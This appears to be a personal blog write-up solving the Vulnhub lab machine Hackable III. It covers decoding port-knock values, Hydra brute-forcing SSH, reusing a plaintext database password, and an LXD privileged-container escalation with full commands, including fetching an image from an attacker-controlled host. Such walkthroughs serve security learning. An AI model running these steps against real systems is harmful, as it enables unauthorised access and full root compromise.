HACKABLE: III
There has been nothing good on THM for a little while now, so I’m working back through some older Vulnhub machines. Not that this is particularly old, but whatever. I had looz in my list so I thought I might do that; once I booted it up I remembered that I already had finished the box but hadn’t bothered writing it up. Ooof. Oh and I’ve also done doubletrouble but haven’t written it up.
Anyway this was HACKABLE: III.
Let’s Go
HTTP only. Let’s start pokin’ around. A comment in the page source on the webroot says:
Please, jubiscleudo, don’t forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com
So…sounds like port knocking. Robots.txt disallows /config, which contains 1.txt, which contains: MTAwMDA=, which is 10000 in base64. That’s our first port.
We find port 2 here: http://192.168.1.100/css/2.txt. This contains some brainfuck, which decodes to 4444; that’s our second port.
Viewing the source for http://192.168.1.100/login.php gives us:
<?php
include('config.php');
$usuario = $_POST['user'];
$senha = $_POST['pass'];
$query = " SELECT * FROM usuarios WHERE user = '{$usuario}' and pass = '{$senha}'";
$result = mysqli_query($conexao, $query);
$row = mysqli_num_rows($result);
#validação conta
if($row == 1) {
$_SESSION['usuario'] = $usuario;
header('Location: 3.jpg');
exit();
} else {
$_SESSION['nao_autenticado'] = true;
header('Location: login_page/login.html');
exit();
}
?>So, if we go get 3.jpg we can run stegseek on it…
┌──(root💀kali)-[/opt/vulnhub/hackable3]
└─# stegseek 3.jpg
StegSeek version 0.5
Progress: 0.00% (0 bytes)
[i] --> Found passphrase: ""
[i] Original filename: "steganopayload148505.txt"
[i] Extracting to "3.jpg.out"
┌──(root💀kali)-[/opt/vulnhub/hackable3]
└─# cat 3.jpg.out
porta:65535 And there’s our third port. Note you don’t have to use three ports for port knocking, but it’s common in CTFs.
Let’s see if it works:
knock 192.168.1.100 10000 4444 65535
Re-run the port scan, and bingo we have SSH open.
SSH
We already had two potential usernames:
- jubiscleudo, and
- dev_suport
And in the course of our fuzzing the webserver, we turned up http://192.168.1.100/backup/wordlist.txt which has 300 entries. I run it first with dev_suport with Hydra; no dice. But it’s bingo with jubiscleudo.
Once we get on, we have one other main user: hackable_3. We can find his password in /var/www/html/.backup_config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'hackable_3');
define('DB_PASSWORD', 'TrOLLED_3');
define('DB_NAME', 'hackable');
/* Attempt to connect to MySQL database */
$conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($conexao === false){
die("ERROR: Could not connect. " . mysqli_connect_error());
} else {
}
?>There is no mysql on the box, but TrOLLED_3 works for hackable_3. hackable_3 is in the lxd group, so that’s it:
hackable_3@ubuntu20:~$ wget http://192.168.1.210:9090/alpine-v3.14-x86_64-20210910_2324.tar.gz
--2021-09-17 12:12:38-- http://192.168.1.210:9090/alpine-v3.14-x86_64-20210910_2324.tar.gz
Connecting to 192.168.1.210:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3253157 (3.1M) [application/x-tar]
Saving to: ‘alpine-v3.14-x86_64-20210910_2324.tar.gz’
alpine-v3.14-x86_64-20210910_2324.tar.gz 100%[================================================================================================================>] 3.10M --.-KB/s in 0.02s
2021-09-17 12:12:38 (172 MB/s) - ‘alpine-v3.14-x86_64-20210910_2324.tar.gz’ saved [3253157/3253157]
hackable_3@ubuntu20:~$ lxc image list
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04
+-------+-------------+--------+-------------+--------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+--------------+------+------+-------------+
hackable_3@ubuntu20:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (lvm, zfs, ceph, btrfs, dir) [default=zfs]:
Create a new ZFS pool? (yes/no) [default=yes]:
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=5GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like the LXD server to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
hackable_3@ubuntu20:~$ lxc image import alpine-v3.14-x86_64-20210910_2324.tar.gz --alias alpine
Image imported with fingerprint: 1b9b6768ec27c8c3e20e09ccd8c1f3bc6a4a9e55b0a858926545c4ad3c88562b
hackable_3@ubuntu20:~$ lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| alpine | 1b9b6768ec27 | no | alpine v3.14 (20210910_23:24) | x86_64 | CONTAINER | 3.10MB | Sep 17, 2021 at 12:13pm (UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
hackable_3@ubuntu20:~$ lxc init alpine privesc -c security.privileged=true
Creating privesc
hackable_3@ubuntu20:~$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
hackable_3@ubuntu20:~$ lxc start privesc
hackable_3@ubuntu20:~$ lxc exec privesc /bin/sh
~ # cd /mnt/root/root
/mnt/root/root # ls -lash
total 48K
4 drwx------ 6 root root 4.0K Jun 29 19:44 .
4 drwxr-xr-x 21 root root 4.0K Apr 29 16:32 ..
0 -rw------- 1 root root 0 Jun 30 20:46 .bash_history
4 -rw-r--r-- 1 root root 3.0K Aug 14 2019 .bashrc
4 drwx------ 2 root root 4.0K Apr 29 16:11 .cache
4 -rw------- 1 root root 28 Jun 29 19:44 .lesshst
4 drwxr-xr-x 3 root root 4.0K Apr 29 16:28 .local
4 -rw-r--r-- 1 root root 161 Sep 16 2020 .profile
4 -rw-r--r-- 1 root root 66 Apr 29 16:37 .selected_editor
4 drwx------ 2 root root 4.0K Apr 27 15:07 .ssh
4 -rwxr-xr-x 1 root root 46 Jun 28 23:21 knockrestart.sh
4 -rw------- 1 root root 2.7K Jun 28 23:41 root.txt
4 drwxr-xr-x 3 root root 4.0K Apr 27 15:07 snap
/mnt/root/root # cat root.txt
░░█▀░░░░░░░░░░░▀▀███████░░░░
░░█▌░░░░░░░░░░░░░░░▀██████░░░
░█▌░░░░░░░░░░░░░░░░███████▌░░
░█░░░░░░░░░░░░░░░░░████████░░
▐▌░░░░░░░░░░░░░░░░░▀██████▌░░
░▌▄███▌░░░░▀████▄░░░░▀████▌░░
▐▀▀▄█▄░▌░░░▄██▄▄▄▀░░░░████▄▄░
▐░▀░░═▐░░░░░░══░░▀░░░░▐▀░▄▀▌▌
▐░░░░░▌░░░░░░░░░░░░░░░▀░▀░░▌▌
▐░░░▄▀░░░▀░▌░░░░░░░░░░░░▌█░▌▌
░▌░░▀▀▄▄▀▀▄▌▌░░░░░░░░░░▐░▀▐▐░
░▌░░▌░▄▄▄▄░░░▌░░░░░░░░▐░░▀▐░░
░█░▐▄██████▄░▐░░░░░░░░█▀▄▄▀░░
░▐░▌▌░░░░░░▀▀▄▐░░░░░░█▌░░░░░░
░░█░░▄▀▀▀▀▄░▄═╝▄░░░▄▀░▌░░░░░░
░░░▌▐░░░░░░▌░▀▀░░▄▀░░▐░░░░░░░
░░░▀▄░░░░░░░░░▄▀▀░░░░█░░░░░░░
░░░▄█▄▄▄▄▄▄▄▀▀░░░░░░░▌▌░░░░░░
░░▄▀▌▀▌░░░░░░░░░░░░░▄▀▀▄░░░░░
▄▀░░▌░▀▄░░░░░░░░░░▄▀░░▌░▀▄░░░
░░░░▌█▄▄▀▄░░░░░░▄▀░░░░▌░░░▌▄▄
░░░▄▐██████▄▄░▄▀░░▄▄▄▄▌░░░░▄░
░░▄▌████████▄▄▄███████▌░░░░░▄
░▄▀░██████████████████▌▀▄░░░░
▀░░░█████▀▀░░░▀███████░░░▀▄░░
░░░░▐█▀░░░▐░░░░░▀████▌░░░░▀▄░
░░░░░░▌░░░▐░░░░▐░░▀▀█░░░░░░░▀
░░░░░░▐░░░░▌░░░▐░░░░░▌░░░░░░░
░╔╗║░╔═╗░═╦═░░░░░╔╗░░╔═╗░╦═╗░
░║║║░║░║░░║░░░░░░╠╩╗░╠═╣░║░║░
░║╚╝░╚═╝░░║░░░░░░╚═╝░║░║░╩═╝░
invite-me: linkedin.com/in/eliastouguinho
/mnt/root/root #